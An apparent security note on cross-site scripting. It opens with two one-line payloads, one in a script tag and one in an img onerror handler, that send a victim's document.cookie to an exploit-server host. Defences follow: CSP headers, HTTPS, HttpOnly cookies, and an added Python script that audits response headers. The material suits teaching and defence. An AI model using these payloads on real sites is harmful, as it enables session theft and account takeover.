XSS - Script to steal cookies


A couple of XSS payloads I frequently use.

Example 1.- One-liner using the <script> tag

<script>var i=new Image;i.src="https://exploit-0ac0001704ff51e6c0466e7d01db00fd.exploit-server.net/exploit?cookie=?"+document.cookie;</script>

Example 2.- One-liner using the <img> tag

<img src=x onerror=this.src='https://exploit-0ac0001704ff51e6c0466e7d01db00fd.exploit-server.net/exploit?cookie='+document.cookie;>

How to protect your cookies?

  • Implement a Content Security Policy (CSP). Examples:
    Allow scripts only from the site's own origin:
    Content-Security-Policy: script-src 'self'

    Allow scripts from the site's own origin and from trusted-domain.com (a domain you control):

    Content-Security-Policy: script-src 'self' https://trusted-domain.com
  • Always use HTTPS; this helps protect your users against man-in-the-middle attacks.
  • Set the HttpOnly flag on your cookies. An HttpOnly cookie cannot be read by client-side scripting languages such as JavaScript, so document.cookie will not expose it.
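A small audit script, added here as an example and not part of the original page, that checks a server's response headers for the protections listed above (a CSP that restricts script-src, and cookies carrying HttpOnly and Secure). The header samples are constructed; the function names are my own.

```python
"""Audit HTTP response headers for the cookie protections described above.

Hypothetical helper (not from the original page): given the response
headers a server sent, report which protections are missing.
"""


def parse_csp(value):
    """Turn "script-src 'self' https://a.com; img-src *" into a dict of directive -> sources."""
    directives = {}
    for part in value.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def check_csp(csp_value):
    """Findings about the script-src directive (falls back to default-src)."""
    if csp_value is None:
        return ["no Content-Security-Policy header"]
    directives = parse_csp(csp_value)
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return ["CSP has no script-src (or default-src) directive"]
    low = [s.lower() for s in sources]
    findings = []
    if "'unsafe-inline'" in low:
        findings.append("script-src allows 'unsafe-inline' (inline <script> and onerror= handlers still run)")
    if "*" in low or any(s in ("http:", "https:") for s in low):
        findings.append("script-src allows scripts from any origin")
    return findings


def check_cookie(set_cookie):
    """Findings for one Set-Cookie header value."""
    name = set_cookie.split("=", 1)[0].strip()
    attrs = {a.strip().split("=", 1)[0].lower() for a in set_cookie.split(";")[1:]}
    findings = []
    if "httponly" not in attrs:
        findings.append(f"cookie {name!r} lacks HttpOnly (readable via document.cookie)")
    if "secure" not in attrs:
        findings.append(f"cookie {name!r} lacks Secure (also sent over plain HTTP)")
    return findings


def audit(headers):
    """headers: list of (name, value) pairs as sent by the server. Returns a list of findings."""
    csp = None
    findings = []
    for name, value in headers:
        if name.lower() == "content-security-policy":
            csp = value
        elif name.lower() == "set-cookie":
            findings += check_cookie(value)
    return check_csp(csp) + findings


# Constructed sample responses (no real server involved).
WEAK = [("Set-Cookie", "session=abc123; Path=/"),
        ("Content-Security-Policy", "script-src 'self' 'unsafe-inline'")]
HARDENED = [("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly"),
            ("Content-Security-Policy", "script-src 'self' https://trusted-domain.com")]

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(hdrs) or ["ok"])
```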

More info https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies